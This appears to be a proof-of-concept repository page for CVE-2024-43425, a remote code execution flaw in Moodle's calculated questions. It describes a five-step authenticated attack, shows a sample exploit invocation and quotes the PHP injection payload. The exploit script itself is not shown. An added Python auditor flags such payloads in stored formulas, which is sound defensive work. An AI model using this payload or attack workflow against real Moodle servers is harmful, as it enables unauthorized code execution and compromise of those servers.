CVE-2024-43425 PoC: Moodle security vulnerability

Associated Vulnerability
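Title: Moodle security vulnerability (CVE-2024-43425)
Description: Moodle is a free, open-source e-learning software platform, also known as a course management system, learning management system, or virtual learning environment. Moodle has a security vulnerability that stems from the need for additional restrictions to avoid a remote code execution risk in calculated question types.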
Readme
# CVE-2024-43425-Poc

CVE Overview
CVE ID: CVE-2024-43425

Description: Moodle allows an authenticated teacher-level user to upload a malicious calculated question via the quiz editor interface.
Impact: Remote Code Execution (RCE)
Cause: Improper sanitization of mathematical payloads inside calculated questions, which leads to command injection through the dataset wizard.

## Requirements:

Valid login credentials
Access to quiz editing interface (usually a teacher or admin role)
Known cmid (quiz module ID) and courseid

## This script performs a 5-step attack:

| Step | Description |
|------|-------------|
| 1 | Fetch login token (logintoken) |
| 2 | Log in and establish a valid MoodleSession |
| 3 | Extract sesskey, ctxid, and category from the quiz edit page |
| 4 | Upload a specially crafted calculated question with an RCE payload |
| 5 | Trigger the payload through the dataset wizard page |

## Usage Instructions

Requirements:
Python 3
Python libraries: requests, bs4 (BeautifulSoup)
~~~
pip3 install requests bs4
~~~
~~~
python3 exploit_cve_2024_43425.py \
  --url http://192.168.2.12/moodle \
  --username test \
  --password 'Test@123' \
  --courseid 1 \
  --cmid 1 \
  --cmd 'whoami'
~~~

## Payload used:
~~~
answer[0] = "(1)->{system($_GET[chr(97)])}"
~~~
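
For defenders, the payload shape above can be hunted for in stored calculated-question answer formulas. The following is an added example, not part of the original PoC repository: it checks formulas against an arithmetic-only grammar. The function allowlist, the names `audit_formula` and `audit_rows`, and the sample rows are assumptions constructed for illustration.

```python
import re

# Assumption: illustrative allowlist of math functions, not Moodle's own list.
ALLOWED_FUNCS = {"abs", "sqrt", "pow", "sin", "cos", "tan", "log", "exp",
                 "round", "floor", "ceil", "min", "max", "pi"}
WILDCARD = re.compile(r"\{[A-Za-z][A-Za-z0-9_]*\}")    # dataset wildcard, e.g. {a}
IDENT = re.compile(r"(?<![\w.])[A-Za-z_]\w*")           # names, not number suffixes
BAD_CHAR = re.compile(r"[^0-9A-Za-z_\s.+\-*/%^(),]")    # outside arithmetic syntax


def audit_formula(formula):
    """Return the reasons a stored answer formula is suspicious ([] means clean)."""
    # Substitute well-formed wildcards first so only the expression is judged.
    expr = WILDCARD.sub("1", formula)
    reasons = []
    if "{" in expr or "}" in expr:
        reasons.append("brace outside a {name} wildcard")
    if "$" in expr:
        reasons.append("PHP variable sigil")
    bad = sorted(set(BAD_CHAR.findall(expr)) - set("{}$"))
    if bad:
        reasons.append("unexpected characters: " + " ".join(bad))
    names = sorted({n for n in IDENT.findall(expr) if n not in ALLOWED_FUNCS})
    if names:
        reasons.append("non-allowlisted names: " + ", ".join(names))
    return reasons


def audit_rows(rows):
    """rows: iterable of (answer_id, formula). Returns {answer_id: reasons} for hits."""
    return {rid: r for rid, f in rows if (r := audit_formula(f))}


# Constructed sample rows; id 3 is the payload string quoted on this page.
SAMPLE_ROWS = [
    (1, "{a} + {b}"),
    (2, "pow({x}, 2) / sqrt({y})"),
    (3, "(1)->{system($_GET[chr(97)])}"),
    (4, "{a} * phpinfo()"),
]

if __name__ == "__main__":
    for rid, reasons in audit_rows(SAMPLE_ROWS).items():
        print(rid, reasons)
```

Any hit on a production site warrants reviewing who authored the question and checking web logs for requests to the dataset wizard around the same time.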
File Snapshot

[4.0K] /data/pocs/a767e76dd6cc30ac0aad2bf820d1fd436ffab910
├── [9.6K] exploit.py
└── [1.2K] README.md

0 directories, 2 files